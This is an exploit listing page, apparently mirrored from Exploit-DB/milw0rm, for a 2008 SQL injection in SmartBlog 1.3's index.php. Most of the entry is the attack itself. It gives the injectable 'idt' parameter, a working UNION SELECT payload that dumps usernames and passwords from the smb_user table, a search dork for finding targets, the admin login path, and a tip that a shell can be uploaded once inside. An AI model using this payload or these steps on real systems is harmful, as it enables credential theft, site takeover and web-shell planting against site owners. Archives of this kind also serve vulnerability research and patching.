[] NeoSense
E X P L O I T S
title author type platform port cve id

SmartBlog 1.3 - 'index.php' SQL Injection

Author: His0k4
type: webapps
platform: php
port: 
date_added: 2008-05-02 
date_updated: 2016-11-25 
verified: 1 
codes: OSVDB-44816;CVE-2008-2185;OSVDB-44815;CVE-2008-2184;OSVDB-44814;CVE-2008-2183 
tags: 
aliases:  
screenshot_url:  
application_url: 
###################################################
[~] Smartblog remote SQL injection exploit
[~] Script download : http://ftp1.toocharger.com/scfQ9NS/smartblog_3868.zip
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] Dork :  Actionnée par smartblog
[~] P.O.C :
---------------------
http://localhost/[script_path]/index.php?idt={SQL}
[~] Exemple :
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
---------------------
[~] Note:
    Admin http://localhost/[script_path]/?page=login.html
    You can upload a shell from the admin panel
---------------------
###############################################

# milw0rm.com [2008-05-03]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.